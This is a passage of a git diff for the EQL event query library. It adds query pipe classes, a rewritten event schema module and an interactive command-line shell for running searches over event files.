the definitions from the old one, and add to them if preprocessor is None: - new_preprocessor = PreProcessor() + new_preprocessor = ast.PreProcessor() else: new_preprocessor = preprocessor.copy() diff --git a/eql/pipes.py b/eql/pipes.py new file mode 100644 index 0000000..529d601 --- /dev/null +++ b/eql/pipes.py @@ -0,0 +1,179 @@ +"""EQL Pipes.""" +from .ast import PipeCommand, TimeRange +from .schema import Schema, EVENT_TYPE_GENERIC +from .types import dynamic, NUMBER, literal, PRIMITIVES, EXPRESSION, get_type +from .utils import is_string + +__all__ = ( + "list_pipes", + "ByPipe", + "HeadPipe", + "TailPipe", + "SortPipe", + "UniquePipe", + "CountPipe", + "FilterPipe", + "UniqueCountPipe", + "WindowPipe" +) + + +def list_pipes(): + """"Get all of the current pipes.""" + return list(sorted(PipeCommand.lookup)) + + +class ByPipe(PipeCommand): + """Pipe that takes a value (field, function, etc.) as a key.""" + + argument_types = [] + additional_types = dynamic(PRIMITIVES) + minimum_args = 1 + + +@PipeCommand.register('count') +class CountPipe(ByPipe): + """Counts number of events that match a field, or total number of events if none specified.""" + + minimum_args = 0 + + @classmethod + def output_schemas(cls, arguments, type_hints, event_schemas): + # type: (list, list, list[Schema]) -> list[Schema] + """Generate the output schema and determine the ``key`` field dyanmically.""" + base_hints = [get_type(t) for t in type_hints] + base_hints = ["mixed" if not is_string(t) else t for t in base_hints] + if len(arguments) == 0: + key_hint = "string" + elif len(arguments) == 1: + key_hint = base_hints[0] + else: + key_hint = base_hints + + return [Schema({ + EVENT_TYPE_GENERIC: { + "count": "number", + "percent": "number", + "total_hosts": "number", + "hosts": ["string"], + "key": key_hint, + } + }, allow_any=False, allow_generic=True)] + + +@PipeCommand.register('head') +class HeadPipe(PipeCommand): + """Node representing the head pipe, analogous to the unix head command.""" + + argument_types = [literal(NUMBER)] + minimum_args = 0 + DEFAULT = 50 + + @classmethod + def validate(cls, arguments, type_hints=None): + """After performing type checks, validate that the count is greater than zero.""" + index, arguments, type_hints = super(HeadPipe, cls).validate(arguments, type_hints) + if index is None and cls(arguments).count <= 0: + index = 0 + return index, arguments, type_hints + + @property + def count(self): # type: () -> int + """Get the number of elements to emit.""" + if len(self.arguments) == 0: + return self.DEFAULT + return self.arguments[0].value + + +@PipeCommand.register('tail') +class TailPipe(PipeCommand): + """Node representing the tail pipe, analogous to the unix tail command.""" + + argument_types = [literal(NUMBER)] + minimum_args = 0 + DEFAULT = 50 + + @classmethod + def validate(cls, arguments, type_hints=None): + """After performing type checks, validate that the count is greater than zero.""" + index = super(TailPipe, cls).validate(arguments, type_hints) + if index is None and cls(arguments).count <= 0: + index = 0 + return index + + @property + def count(self): # type: () -> int + """Get the number of elements to emit.""" + if len(self.arguments) == 0: + return self.DEFAULT + return self.arguments[0].value + + +@PipeCommand.register('sort') +class SortPipe(ByPipe): + """Sorts the pipes by field comparisons.""" + + +@PipeCommand.register('unique') +class UniquePipe(ByPipe): + """Filters events on a per-field basis, and only outputs the first event seen for a field.""" + + +@PipeCommand.register('unique_count') +class UniqueCountPipe(ByPipe): + """Returns unique results but adds a count field.""" + + minimum_args = 0 + + @classmethod + def output_schemas(cls, arguments, type_hints, event_schemas): + # type: (list, list, list[Schema]) -> list[Schema] + """Generate the output schema and determine the ``key`` field dyanmically.""" + event_schemas = list(event_schemas) + first_event_type, = event_schemas[0].schema.keys() + if any(v for v in event_schemas[0].schema.values()): + event_schemas[0] = event_schemas[0].merge(Schema({ + first_event_type: { + "count": "number", + "total_hosts": "number", + "hosts": ["string"], + "percent": "number", + } + }, allow_any=False, allow_generic=True)) + return event_schemas + + +@PipeCommand.register('filter') +class FilterPipe(PipeCommand): + """Takes data coming into an existing pipe and filters it further.""" + + argument_types = [EXPRESSION] + + @property + def expression(self): + """Get the filter expression.""" + return self.arguments[0] + + +@PipeCommand.register('window') +class WindowPipe(PipeCommand): + """Maintains a time window buffer for streaming events.""" + + argument_types = [literal(NUMBER)] + + minimum_args = 1 + maximum_args = 1 + + @property + def timespan(self): + """Get timespan as a TimeRange object.""" + return TimeRange.convert(self.arguments[0]) + + @classmethod + def validate(cls, arguments, type_hints=None): + """After performing type checks, validate that the timespan is greater than zero.""" + index, arguments, type_hints = super(WindowPipe, cls).validate(arguments, type_hints) + ts = cls(arguments).timespan + if index is None and (ts is None or ts.delta.total_seconds() <= 0): + index = 0 + return index, arguments, type_hints diff --git a/eql/schema.py b/eql/schema.py index f77c5b4..67c12a8 100644 --- a/eql/schema.py +++ b/eql/schema.py @@ -1,46 +1,304 @@ """Eventing data schemas.""" -from eql.etc import get_etc_path -from eql.utils import load_dump -import contextlib +import re +from .types import ( + Nested, Array, BASE_PRIMITIVES, check_types, + BASE_ALL, BASE_STRING, BASE_BOOLEAN, BASE_NULL, BASE_NUMBER +) +from .errors import EqlError +from .utils import is_string, is_number, ParserConfig - -SCHEMA_FILE = get_etc_path('schema.json') -_schema = {} +_global = None EVENT_TYPE_ANY = 'any' EVENT_TYPE_GENERIC = 'generic' +MIXED_TYPES = "mixed" +IDENT_RE = re.compile(r"^[a-zA-Z][a-zA-Z0-9_]*$") + + +class Schema(ParserConfig): + """Schema of all event types. + + Expected input format: + { + "process": { + "process_name": "string", + "command_line", "..." + }, + "complex": { + "flat": "string", + "somearray": [], + "somearray": ["string", "number", "boolean"], + "field1": {"nested_field": "mixed", "doublenested": [{"sub1": "string", "sub2": "field"}]}, + "flexiblefield": {} + } + """ + + _default_schema = None + + def __init__(self, events, allow_generic=True, allow_any=True, allow_missing=False): + """Create a schema.""" + self.allow_generic = allow_generic + self.allow_any = allow_any + self.allow_missing = allow_missing + self.schema = events + + if not self.validate_schema(): + raise EqlError("Invalid input schema {}".format(repr(events))) + + super(Schema, self).__init__(schema=self) + + def _validate_field_schema(self, field_schema): + """Validate that a field schema is correct.""" + if is_string(field_schema) and len(field_schema) > 0: + if field_schema == MIXED_TYPES: + return True + return check_types(BASE_PRIMITIVES, field_schema) + elif isinstance(field_schema, (list, tuple)): + return not field_schema or all(self._validate_field_schema(s) for s in field_schema) + elif isinstance(field_schema, dict): + for name, nested in field_schema.items(): + status = is_string(name) and IDENT_RE.match(name) and self._validate_field_schema(nested) + if not status: + return False + return True + return False + + def validate_schema(self): + """Validate that the schema is valid.""" + if not isinstance(self.schema, dict): + return False + + for key, event_schema in self.schema.items(): + status = is_string(key) and isinstance(event_schema, dict) + if not status: + return False + + for name, field_schema in event_schema.items(): + status = is_string(name) and self._validate_field_schema(field_schema) + if not status: + return False + return True + + @classmethod + def _convert_to_type(cls, schema): + """Convert a schema to the type system.""" + if schema == {} or schema == MIXED_TYPES: + return BASE_ALL + elif isinstance(schema, dict): + return Nested([(k, cls._convert_to_type(s)) for k, s in sorted(schema.items())]) + elif isinstance(schema, (list, tuple)): + return Array([cls._convert_to_type(s) for s in schema]) + else: + return schema + + def _get_path_hint(self, event_schema, path): + """Validate a field against a schema.""" + base = path[0] + subpath = path[1:] + + if is_number(base): + # if the index is numeric, then the field must be an array + if not isinstance(event_schema, (list, tuple)): + return + elif subpath: + # if it's nested, then we have to enumerate over the union of nested schemas + for subschema in event_schema: + hint = self._get_path_hint(subschema, subpath) + if hint: + return hint + return + else: + return self._convert_to_type(event_schema[0]) + elif isinstance(event_schema, (list, tuple)): + # strings can't index into arrays + return + elif event_schema == {}: + # if the event schema is wide open, then anything goes + return self._convert_to_type(event_schema) + elif isinstance(event_schema, dict) and base in event_schema: + if event_schema and subpath: + # check if the current field is in the schema, and we still have to recurse + return self._get_path_hint(event_schema[base], subpath) + else: + # return the type hint if one exists + return self._convert_to_type(event_schema[base]) + + def get_event_type_hint(self, event_type, path): + """Validate that a field matches an event_type.""" + if not self.schema: + return BASE_ALL + elif event_type == EVENT_TYPE_ANY: + # search all of the known events, and find one that has this schema + if self.allow_any: + if not self.schema: + return BASE_ALL + for event_type in self.schema: + field_type = self.get_event_type_hint(event_type, path) + if field_type is not None: + return field_type + if self.allow_missing: + return BASE_ALL + elif event_type in self.schema: + # Convert the values to the expected string values or None + type_hint = self._get_path_hint(self.schema[event_type], path) + if type_hint is not None: + return type_hint + elif self.allow_missing: + return BASE_ALL + elif event_type == EVENT_TYPE_GENERIC: + if self.allow_generic: + return BASE_ALL + + def validate_event_type(self, event_type): + """Validate that an event type is allowed by the schema.""" + if event_type == EVENT_TYPE_ANY: + return self.allow_any + elif event_type in self.schema: + return True + elif event_type == EVENT_TYPE_GENERIC: + return self.allow_generic + elif not self.schema: + return True + else: + return False + + @classmethod + def _merge_subschema(cls, a, b): + """Merge two subschemas together recursively.""" + if a is None: + return b + elif b is None: + return a + if a == MIXED_TYPES or b == MIXED_TYPES: + return MIXED_TYPES + elif is_string(a) and is_string(b): + if a != b: + return MIXED_TYPES + return a + elif type(a) != type(b): + return MIXED_TYPES + elif isinstance(a, list): + if not a: + return b + elif not b: + return a + + strings_a = [s for s in a if is_string(s)] + strings_b = [s for s in b if is_string(s)] + nested_a = [s for s in b if not is_string(s)] + nested_b = [s for s in b if not is_string(s)] + + # Too complicated + if (strings_a or strings_b) and (nested_a or nested_b): + return [] + elif strings_a: + return list(sorted(set(strings_a).union(set(strings_b)))) + elif len(nested_a) == 1 and len(nested_b) == 1: + return [cls._merge_subschema(nested_a[0], nested_b[0])] + else: + return [MIXED_TYPES] + + elif isinstance(a, dict): + common_keys = set(a).union(set(b)) + return {k: cls._merge_subschema(a.get(k), b.get(k)) for k in common_keys} + else: + return MIXED_TYPES + + def merge(self, other): # type: (Schema) -> Schema + """Merge a schema (non-recursively) on to an existing one.""" + # prefer the keys of the original over the added one + empty_schemas = not all(other.schema.values()) + full_schema = {event: s.copy() for event, s in other.schema.items()} + for event_type, event_schema in self.schema.items(): + full_schema.setdefault(event_type, {}) + full_schema[event_type].update(event_schema) + return Schema(full_schema, + allow_generic=self.allow_generic or other.allow_generic, + allow_any=self.allow_any or other.allow_any, + allow_missing=(self.allow_missing or other.allow_missing) or empty_schemas) -def reset_schema(): - """Reset the schema to the default.""" - global _schema - update_schema(load_dump(SCHEMA_FILE)) + def flatten(self): # type: () -> Schema + """Flatten a schema to a single event type.""" + flattened = {} + empty_schemas = not all(self.schema.values()) + for event_type, event_schema in sorted(self.schema.items()): + flattened.update(event_schema) + return Schema({EVENT_TYPE_GENERIC: flattened}, + allow_generic=False, + allow_any=True, + allow_missing=self.allow_missing or empty_schemas) + @classmethod + def default(cls, default=None): # type: (Schema) -> Schema + """Retrieve the active schema or the default.""" + if default is not None: + cls._default_schema = default + return cls._default_schema -def check_event_name(name): - """Check if an event is recognized by the schema.""" - return name in (EVENT_TYPE_ANY, EVENT_TYPE_GENERIC) or name in _schema['event_types'] + @classmethod + def current(cls): # type: () -> Schema + """Retrieve the active schema or the default.""" + current = cls.read_stack("schema") + if current is None: + return cls.default() + return current + @classmethod + def _get_item_schema(cls, data): + """Get the schema for an event.""" + if isinstance(data, dict): + schema = {} + for k, v in data.items(): + s = cls._get_item_schema(v) + if IDENT_RE.match(k) and s is not None: + schema[k] = s + return schema -def update_schema(schema): - """Update the eventing schema.""" - _schema.clear() - _schema.update(schema) + if data is None: + return BASE_NULL + elif isinstance(data, list): + schema_base = set() + nested_schema = None + for v in data: + s = cls._get_item_schema(v) + if is_string(s): + schema_base.add(s) + elif s is not None: + if nested_schema is not None: + cls._merge_subschema(nested_schema, s) + else: + nested_schema = s + if nested_schema is not None and schema_base: + return MIXED_TYPES + elif schema_base: + return list(sorted(schema_base)) + else: + return nested_schema + elif is_string(data): + return BASE_STRING + elif isinstance(data, bool): + return BASE_BOOLEAN + elif is_number(data): + return BASE_NUMBER -@contextlib.contextmanager -def use_schema(schema=None): - """Context manager for using python's `with` syntax for using a schema when parsing.""" - current_schema = _schema.copy() - if schema is not None: - try: - update_schema(schema) - yield - finally: - update_schema(current_schema) + @classmethod + def learn(cls, events): + """Learn the active schema for a list of events.""" + from .events import Event + schema = {} + allow_generic = False + for event in events: + if not isinstance(event, Event): + event = Event.from_data(event) + if event.type == EVENT_TYPE_GENERIC: + allow_generic = True + item_schema = cls._get_item_schema(event.data) + schema[event.type] = cls._merge_subschema(schema.get(event.type), item_schema) + return Schema(schema, allow_generic=allow_generic) - else: - yield +EMPTY_SCHEMA = Schema({}, allow_generic=True, allow_any=True) -reset_schema() +Schema.default(EMPTY_SCHEMA) diff --git a/eql/shell.py b/eql/shell.py new file mode 100644 index 0000000..d0aec82 --- /dev/null +++ b/eql/shell.py @@ -0,0 +1,748 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- +"""Wrapper around the Cmd library for EQL.""" +from __future__ import print_function + +import cmd +import csv +import importlib +import os +import json +import re +import sys +from collections import defaultdict + +from .ast import NamedSubquery +from .engine import PythonEngine +from .errors import EqlSyntaxError, EqlParseError +from .functions import list_functions +from .parser import parse_query, _get_parser, allow_enum_fields +from .pipes import list_pipes, CountPipe +from .schema import Schema, EVENT_TYPE_ANY, EVENT_TYPE_GENERIC +from .table import Table +from .types import Array, Nested, is_union +from .utils import stream_file_events, load_dump, to_unicode, is_array + +try: + import prompt_toolkit + from prompt_toolkit.formatted_text import PygmentsTokens + from prompt_toolkit.lexers import PygmentsLexer + from prompt_toolkit.document import Document + from prompt_toolkit.completion import WordCompleter, PathCompleter, Completer, Completion + from prompt_toolkit.history import FileHistory + from prompt_toolkit import PromptSession +except ImportError: + prompt_toolkit = None + Completer = object + PygmentsTokens = None + +try: + from prompt_toolkit import print_formatted_text +except ImportError: + print_formatted_text = print + +try: + from .highlighters import EqlLexer +except ImportError: + EqlLexer = None + + +try: + import pygments + from pygments.styles import get_style_by_name, get_all_styles + from prompt_toolkit.styles import style_from_pygments_cls +except ImportError: + pygments = None + get_style_by_name = None + get_all_styles = None + style_from_pygments_cls = None + +# Determine the installed version of readline +readline = None +readline_type = None + +LIBEDIT = "libedit" +PYREADLINE = "pyreadline" +GNUREADLINE = "gnureadline" + +# Determine the input function that should be used for the prompt +input_func = getattr(__builtins__, "raw_input", input) + +# Determine which version of readline is installed +for module in ["readline", "gnureadline"]: + try: + readline = importlib.import_module(module) + readline_doc = (getattr(readline, "__doc__", None) or "").lower() + if PYREADLINE in sys.modules: + readline_type = PYREADLINE + elif LIBEDIT in readline_doc: + readline_type = LIBEDIT + elif "gnu" in readline_doc.lower() or module == GNUREADLINE: + readline_type = GNUREADLINE + + break + + except Exception: + continue + +# if we found a readline, but had an error loading _the_ readline, so we'll replace it +if readline is not None and readline not in sys.modules: + sys.modules['readline'] = readline + + +def callmethod(obj, method, default=None, *args, **kwargs): + """Call a method but get a default value if it doesn't exist.""" + method = getattr(obj, method, None) + if callable(method): + return method(*args, **kwargs) + return default + + +class ShellCompleter(Completer): + """Completer for shell commands and EQL syntax.""" + + def __init__(self, shell): # type: (EqlShell) -> None + """Completer for EQL shell.""" + self.shell = shell + self.command_completer = WordCompleter(lambda: shell.completenames(""), match_middle=True) + self.path_completer = PathCompleter(expanduser=True) + + def get_completions(self, document, complete_event): + """Get possible completions depending on context.""" + completer = None + complete_remaining = False + complete_eql = False + first_word = None + + if not self.shell.multiline: + self.shell.prompt_session.lexer = None + first_word = document.text and document.text.split()[0] + if ' ' not in document.text: + completer = self.command_completer + elif first_word == "search": + complete_eql = True + self.shell.prompt_session.lexer = self.shell.tk_lexer + elif first_word in ("input", "config", "output"): + completer = self.path_completer + complete_remaining = True + else: + self.shell.prompt_session.lexer = self.shell.tk_lexer + complete_eql = True + + if complete_eql: + word = document.get_word_before_cursor() + for match in self.shell.complete_search(word, document.text, document.cursor_position, + len(document.text), contains=True): + yield Completion(match, -len(word)) + return + + if completer: + if complete_remaining: + offset = len(first_word) + 1 + path_doc = Document(document.text[offset:]) + for completion in self.path_completer.get_completions(path_doc, complete_event): + yield Completion(completion.text, 0, display=completion.display) + else: + for completion in completer.get_completions(document, complete_event): + yield completion + elif first_word: + word = document.get_word_before_cursor() + method = getattr(self.shell, "complete_" + first_word, None) + if method: + for match in method(word, document.text_before_cursor, document.cursor_position, len(document.text)): + yield Completion(match, -len(word)) + + +class EqlShell(cmd.Cmd, object): + """Event Query Language interactive console application.""" + + # Allow dashes + identchars = cmd.Cmd.identchars + '-' + default_prompt = "eql> " + continue_prompt = " ..> " + history_file = os.path.join(os.path.expanduser("~"), '.eql') + ansi_invisible_re = re.compile(r"(\x1b.*?[a-z])") + nested_field_re = re.compile(r"\b([a-zA-Z][a-zA-Z0-9_]*)((\[(\d+)\]|\.([a-zA-Z][a-zA-Z0-9_]*))+|\.|\[\d*)$") + + field_split = re.compile(r"[.\[\]]+") + doc_header = "Available commands (type help ):" + + __eql_keywords = set() + + def __init__(self, *args, **kwargs): + """EQL Shell.""" + super(EqlShell, self).__init__(*args, **kwargs) + self.tty = callmethod(self.stdout, "isatty", False) + self.multiline = False + self.stop = False + self.last_results = [] + self.columns = [] + self.input_file = None + self.empty_count = 0 + self.prompt_session = False + self.config = None + self.last_display_fn = None + self.display_fn = None + self.last_query = None + + if prompt_toolkit and self.tty: + self.tk_lexer = None + if EqlLexer: + self.tk_lexer = PygmentsLexer(EqlLexer) + + self.tk_completer = ShellCompleter(self) + self.tk_history = FileHistory(self.history_file + ".tk") + style_cls = None + + # switch to something more friendly + if get_style_by_name: + style = get_style_by_name("rrt" if sys.platform.startswith("win") else "monokai") + if style: + style_cls = style_from_pygments_cls(style) + + self.default_style = style_cls + self.prompt_session = PromptSession(style=style_cls, history=self.tk_history, + completer=self.tk_completer) + + @classmethod + def get_keywords(cls, force=False): + """Get the EQL keywords.""" + if force or not cls.__eql_keywords: + wordlist = set() + parser = _get_parser() + keywords = set(parser.keywords) + + keywords.remove("in") + keywords.add("in (") + + wordlist.update(["true", "false", "null"]) + + keywords.remove("with") + wordlist.update(["with maxspan=", "fork=true"]) + + wordlist.update("{}(".format(f) for f in list_functions()) + wordlist.update("| {}".format(p) for p in list_pipes()) + keywords.remove("of") + wordlist.update(["{} of [".format(k) for k in NamedSubquery.supported_types]) + + wordlist.update(keywords) + cls.__eql_keywords = list(sorted(wordlist)) + return cls.__eql_keywords + + def prompt_func(self, text=None): + """Colorize the prompt if possible.""" + if text is None: + text = self.prompt + + # Only use prompt_toolkit when running on multiple lines + if self.prompt_session: + return self.prompt_session.prompt(text) + return input_func(text) + + @property + def prompt(self): + """Dynamically determine the prompt based off the current state.""" + return self.continue_prompt if self.multiline else self.default_prompt + + def emptyline(self): + """Don't automatically run that last command on duplicate ENTER.""" + return "" + + def cmdloop(self, intro=None): + """Patch the original cmd.Cmd for better support.""" + self.preloop() + old_completer = None + if readline: + old_completer = readline.get_completer() + readline.set_completer(self.complete) + to_parse = self.completekey + ": complete" + if readline_type == LIBEDIT: + to_parse = 'bind ^I rl_complete' + readline.parse_and_bind(to_parse) + + try: + if intro is not None: + self.intro = intro + if self.intro: + print_formatted_text(intro) + + print_formatted_text("type help to view more commands") + + self.stop = False + + while not self.stop: + try: + line = self.prompt_func(self.prompt) + if isinstance(line, bytes): + line = line.decode("utf-8") + line = line.rstrip("\r\n") + except EOFError: + print_formatted_text("") + self.stop = True + line = "" + except KeyboardInterrupt: + print_formatted_text() + print_formatted_text("KeyboardInterrupt") + self.multiline = False + continue + + line = self.precmd(line) + self.stop = self.onecmd(line) or self.stop + self.stop = self.postcmd(self.stop, line) + self.postloop() + finally: + if readline and old_completer: + callmethod(readline, "set_completer", None, old_completer) + + def parseline(self, line): + """Continue parsing multiple lines when enabled.""" + if self.multiline: + line = self.lastcmd + "\n" + line + cmd, arg, line = super(EqlShell, self).parseline(line) + + if self.multiline and line == self.lastcmd: + self.empty_count += 1 + else: + self.empty_count = 0 + return cmd, arg, line + + def onecmd(self, line): + """Wrap exception handling.""" + try: + return super(EqlShell, self).onecmd(line) + except EqlParseError as err: + self.multiline = False + + if pygments and EqlLexer and self.prompt_session: + # Recover the original text + err_text = to_unicode(err) + lines = err_text.splitlines() + print_formatted_text("\n".join(lines[:2])) + tokens = list(pygments.lex("\n".join(lines[2:]), lexer=EqlLexer())) + print_formatted_text(PygmentsTokens(tokens), style=self.prompt_session.style) + else: + print_formatted_text(err) + except Exception as err: + self.multiline = False + print_formatted_text(u"{}: {}".format(type(err).__name__, err)) + + def complete_single_file(self, text, line, begidx, endidx): + """Tab completion for file paths.""" + startpos = 0 + + while startpos < len(line) and line[startpos] in self.identchars: + startpos += 1 + + startpos += len(line[startpos:]) - len(line[startpos:].lstrip()) + file_path = "".join(line[startpos:]) + + matches = self.complete_files(file_path) + completions = [m[begidx - startpos:] for m in matches] + return completions + + def default(self, line): + """Return the line.""" + print_formatted_text("Unknown command: " + line) + + def complete_files(self, text): + """Get tab-completion options for file paths.""" + matches = [] + directory, match = os.path.split(text) + expanded_dir = os.path.expanduser(directory or ".") + if not os.path.exists(expanded_dir): + return [] + + for name in os.listdir(os.path.expanduser(directory or ".")): + if name.startswith(match): + matches.append(os.path.join(directory, name)) + return matches[:40] + + def do_input(self, file_path): + """Point EQL to a data file for searches to be executed against.""" + # Confirm that it loads and that events are found + if not file_path: + print_formatted_text("Error: File path not specified") + return + + file_path = os.path.expanduser(file_path) + size = [0] + + def increment(event): + size[0] += 1 + return event + + event_stream = stream_file_events(file_path) + schema = Schema.learn(increment(event) for event in event_stream) + print_formatted_text("Using file {:s} with {:d} events".format(file_path, size[0])) + Schema.default(schema) + self.input_file = file_path + + def do_schema(self, line): + """Show the current EQL schema used to validate queries against the input file.""" + import pprint + pprint.pprint(Schema.current().schema) + + def do_config(self, file_path): + """Load a config file for schema checking or other engine parameters.""" + if not file_path: + print_formatted_text("Error: File path not specified") + return + + config = load_dump(file_path) + if not isinstance(config, dict): + print_formatted_text("Invalid config data") + + self.config = config + if config.get("schema") is not None: + schema = Schema(**self.config["schema"]) + schema.default(schema) + + # Only enable this command if prompt toolkit is found + if prompt_toolkit and get_all_styles: + def do_style(self, line): + """Change the color theme used for syntax highlighting.""" + styles = set(get_all_styles()) + if "reset" in line.split(): + self.prompt_session.style = self.default_style + return + elif line in styles: + pygments_style_cls = get_style_by_name(line) + self.prompt_session.style = style_from_pygments_cls(pygments_style_cls) + return + elif line: + print_formatted_text("Invalid style\n") + + # Print the list of available styles + self.print_topics("Available styles", list(sorted(styles)), 15, 80) + + def complete_style(self, text, line, begidx, endidx): + """"Complete pygment styles.""" + styles = list(get_all_styles()) + styles.append("reset") + styles = [s for s in styles if text in s] + # sort the exact matches to the top + styles.sort(key=lambda s: (not s.startswith(text), s)) + return styles + + complete_input = complete_single_file + complete_config = complete_single_file + complete_output = complete_single_file + + def do_clear(self, *args): + """Clear the terminal.""" + if sys.platform.startswith('win'): + os.system('cls') + else: + sys.stdout.write('\033[2J\033[1;1H') + + def help_search(self, *args): + """Print help text.""" + print_formatted_text(to_unicode(EqlShell.do_search.__doc__)) + print_formatted_text("\nQueries spanning multiple lines can be terminated with two newlines or a semicolon.") + + def do_search(self, search_text): + """Run an EQL search over the input data.""" + search_lines = search_text.splitlines(keepends=False) + self.multiline = False + + # if only "search" is typed in, then keep prompting + if not search_text: + self.multiline = True + return + + try: + with allow_enum_fields: + parsed_query = parse_query(search_text, implied_base=True, implied_any=True, cli=True) + except EqlSyntaxError as exc: + # check if the query should be continued on another line + if (exc.line + 1) == len(search_lines) and (exc.column + 1) == len(search_lines[-1]): + if not search_text.endswith(";"): + self.multiline = True + return + raise + + # check if the query is fully valid, but spans multiple lines + # we want to keep prompting until we see a semicolon, or two blank lines + if len(self.lastcmd.splitlines(keepends=True)) > 1: + if not search_text.endswith(";") and self.empty_count < 2: + self.multiline = True + return + + if not self.input_file: + print_formatted_text("Input file required. Run `input `") + return + + engine = PythonEngine(self.config) + self.last_results = [] + count = [0] + + def callback(results): + count[0] += 1 + for e in results.events: + self.last_results.append(e.data) + if self.display_fn is None: + if count[0] < 100: + engine.print_event(e) + elif count[0] == 100: + print_formatted_text("...") + count[0] += 1 + + engine.config["flatten"] = False + engine.add_query(parsed_query) + engine.add_output_hook(callback) + event_stream = stream_file_events(self.input_file) + engine.stream_events(event_stream) + + self.last_query = parsed_query + + count = len(self.last_results) + + if self.display_fn and count: + self.display_fn(self.last_results) + + # Unconditionally show the number of results returned + print_formatted_text("{:d} result{} found".format(count, "" if count == 1 else "s")) + + def complete_search(self, text, line, begidx, endidx, fields_only=False, contains=False): # noqa: C901 + """Complete EQL keywords or known schema fields.""" + matches = set() + nested_match = self.nested_field_re.search(line) + + schema = Schema.current() # type: Schema + + # check for completion of nested fields + if nested_match: + parts = self.field_split.split(nested_match.group(0)) + path = [int(f) if f.isdigit() else f for f in parts] + + # for now, just drop events[0] for completing the schema + if len(path) > 2 and path[0] == "events" and isinstance(path[1], int): + path = path[2:] + + # determine what could be completed + if len(path) > 1: + type_hint = schema.get_event_type_hint(EVENT_TYPE_ANY, path[:-1]) + else: + # we don't know what the event type is so it could technically be any of the top level fields + type_hints = defaultdict(list) + + for event_type, event_schema in schema.schema.items(): + for k in event_schema: + type_hints[k].append(schema.get_event_type_hint(event_type, [k])) + + # union them all together + type_hint = Nested([(k, tuple(v)) for k, v in type_hints.items()]) + + prefix = text if text.endswith(".") else "" + if isinstance(type_hint, Nested): + for key, v in type_hint: + if key == path[-1]: + if isinstance(v, Nested): + matches.add(prefix + key + ".") + elif isinstance(v, Array): + matches.add(prefix + key + "[") + else: + matches.add(prefix + key) + + elif is_union(type_hint): + for option in type_hint: + if isinstance(option, Nested): + for key, v in option: + if key == path[-1]: + if isinstance(v, Nested): + matches.add(prefix + key + ".") + elif isinstance(v, Array): + matches.add(prefix + key + "[") + else: + matches.add(prefix + key) + + else: + if not fields_only: + matches.update(self.get_keywords()) + + # if you're in a pipe, allow completion for only pipes + completed = line if not text else line[:-len(text)] + if completed.rstrip().endswith("|"): + return list(sorted(pipe for pipe in list_pipes() if pipe.startswith(text))) + + # require keywords to have exact (not substring) matches + matches = {m for m in matches if m.startswith(m)} + + if schema.allow_any: + matches.add(EVENT_TYPE_ANY) + + if schema.allow_generic: + matches.add(EVENT_TYPE_GENERIC) + + matches.update(schema.schema) + + for event_schema in schema.schema.values(): + for k, v in event_schema.items(): + if isinstance(v, dict): + matches.add(k + ".") + else: + matches.add(k) + + if text: + if contains: + matches = [w for w in set(matches) if text in w] + # show the matches that start with this first + matches.sort(key=lambda m: (not m.startswith(text), m)) + return matches + return list(sorted(w for w in matches if w.startswith(text))) + return [] + + def _save_csv(self, path, results): + with open(path, "w") as output_file: + if not results: + return + + all_fields = set() + array_fields = defaultdict(int) + + for result in results: + for k, v in result.items(): + all_fields.add(k) + if is_array(v): + array_fields[k] = max(array_fields[k], len(v)) + + # now build up the columns + array_fields = {k: v for k, v in array_fields.items() if v < 3} + all_fields = list(sorted(all_fields)) + + # Start building the csv + csv_file = csv.writer(output_file, quoting=csv.QUOTE_MINIMAL) + header = [] + for k in all_fields: + if k in array_fields: + header.extend(["{}[{}]".format(k, i) for i in range(array_fields[k])]) + else: + header.append(k) + + # check for python 2 compatibility + if type(u"") != str: + def writerow(row): + csv_file.writerow([cell.encode("utf8") for cell in row]) + else: + writerow = csv_file.writerow + + writerow(header) + + for result in results: + row = [] + + for k in all_fields: + value = result.get(k, "") + if k in array_fields: + for i in range(array_fields[k]): + if is_array(value) and i < len(value): + row.append(value[i]) + else: + row.append("") + else: + row.append(value) + + writerow([to_unicode(r) if r is not None else "" for r in row]) + + def complete_display(self, text, line, *args): + """Complete on or off values.""" + options = ("off", "on") + + if not text: + return options + else: + return [o for o in options if text.startswith(o)] + + def do_display(self, line): + """Toggle the displaying of results.""" + if line == "off": + if self.display_fn: + self.last_display_fn = self.display_fn or self.last_display_fn + self.display_fn = False + elif line == "on": + if not self.display_fn: + self.display_fn = self.last_display_fn + self.last_display_fn = False + self.display_fn = self.display_fn or None + else: + print("Expected on/off to display.", file=sys.stderr) + + def do_output(self, path): + """Save the most recent results as a .json, .jsonl, or .csv file.""" + _, extension = os.path.splitext(path) + extension = extension.lower() + + if extension == ".csv": + self._save_csv(path, self.last_results) + elif extension == ".jsonl": + with open(path, "w") as f: + for result in self.last_results: + f.write(json.dumps(result)) + f.write("\n") + elif extension == ".json": + with open(path, "w") as f: + json.dump(self.last_results, f, indent=2, sort_keys=True) + else: + print("Unknown file type: {:s}".format(extension), file=sys.stderr) + return + + print("Saved {:d} results to {:s}".format(len(self.last_results or []), path)) + + def do_shell(self, line): + """Run a shell command.""" + os.system(line) + + def do_table(self, line): + """Render the most recent results as a table and arguments will update the columns.""" + if not line and not self.last_results: + print_formatted_text("No results to render, and no columns specified.") + print_formatted_text("Try performing a `search` command") + return + + if "--clear" in line: + self.display_fn = None + return + + if line or not self.display_fn: + columns = [c.strip() for c in re.split(r"[,\s]+", line) if c.strip()] + count_keys = {"count", "key", "percent"} + + def display_table(results): + dynamic_columns = list(columns) + show_counts = set(count_keys).intersection(set(columns)) + show_counts = show_counts or any(c.startswith("key[") or c.startswith("key.") for c in dynamic_columns) + + if any(isinstance(pipe, CountPipe) for pipe in self.last_query.pipes) and not show_counts: + last_count = next(pipe for pipe in reversed(self.last_query.pipes) if isinstance(pipe, CountPipe)) + # Figure out how many keys there are + dynamic_columns = {"count": None} + + if last_count.arguments: + dynamic_columns["key"] = True + + if len(self.last_results) > 1: + for key in ("percent", "total_hosts"): + if key in self.last_results[0]: + dynamic_columns[key] = None + + table = Table.from_list(dynamic_columns, results) + for i, row in enumerate(table.lines()): + # , bold=(0 < i <= len(table._headers))) + print_formatted_text(row) + + self.display_fn = display_table + + if self.last_results and self.display_fn: + self.display_fn(self.last_results) + + def complete_table(self, *args): + """Tab completion for tables.""" + return self.complete_search(*args, fields_only=True, contains=True) + + def do_quit(self, line): + """Exit the shell.""" + return True + + def do_exit(self, line): + """Exit the shell.""" + return True diff --git a/eql/signatures.py b/eql/signatures.py new file mode 100644 